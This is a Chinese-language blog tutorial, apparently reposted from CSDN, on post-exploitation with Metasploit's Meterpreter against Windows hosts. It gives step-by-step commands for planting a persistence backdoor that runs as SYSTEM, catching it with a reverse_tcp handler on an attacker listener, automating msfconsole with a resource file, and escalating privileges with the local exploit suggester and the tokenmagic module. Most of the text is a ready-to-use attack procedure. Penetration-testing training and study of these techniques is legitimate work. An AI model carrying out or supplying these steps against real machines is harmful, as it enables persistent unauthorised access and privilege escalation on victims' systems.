Metapreter实现持续访问,自动化,提权--详细教程

发布时间:2024年01月05日

Metapreter 实现持续访问

1.先拿到目标主机的控制权限后,将目标主机的会话转入后台,切换到 exploit/windows/local/persistence 模块,注意这个模块选择的payload,因为在后面进行监听的时候需要和这个payload相同

在这里插入图片描述
2.通过options查看需要填写的参数

EXE_NAME 生成后门文件的文件名称(非必要,用默认)
PATH 后门文件的存放路径 (非必要,用默认)
REG_NAME 注册表设置的名称 (非必要,用默认)
SESSION 作用于那个会话
STARTUP 由那个用户来运行这个脚本(一般都写SYSTEM,注:这里必须大写)
VBS_NAME VBS脚本的名称 (非必要,用默认)
在这里插入图片描述
set SESSION 8
setg lhost 173.30.1.3

在这里插入图片描述
3.执行
exploit
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
4. 打开kali监听模块 exploit/multi/handler
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 172.30.1.3
set lport 7723
exploit -j -z

-j 加入任务
-z 后台运行
在这里插入图片描述

Metapreter自动化

msfconsole -q -r <文件名> 启动时读取文件命令执行实现自动化

cat msfstart.txt
在这里插入图片描述

msfconsole -q -r msfstart.txt
这里会自动执行文件中的命令

在这里插入图片描述

Metapreter提权

local exploit suggester 模块(本地漏洞利用),用来做提权
search suggester
在这里插入图片描述
use 0
options
在这里插入图片描述
set session 1
exploit
在这里插入图片描述

可以尝试前面绿色的
在这里插入图片描述
use exploit exploit/windows/local/tokenmagic
options

在这里插入图片描述
set session 1
set LHOST 172.30.1.3
exploit
getuid

提权成功
在这里插入图片描述

文章来源:https://blog.csdn.net/qq_41245301/article/details/135294976
本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。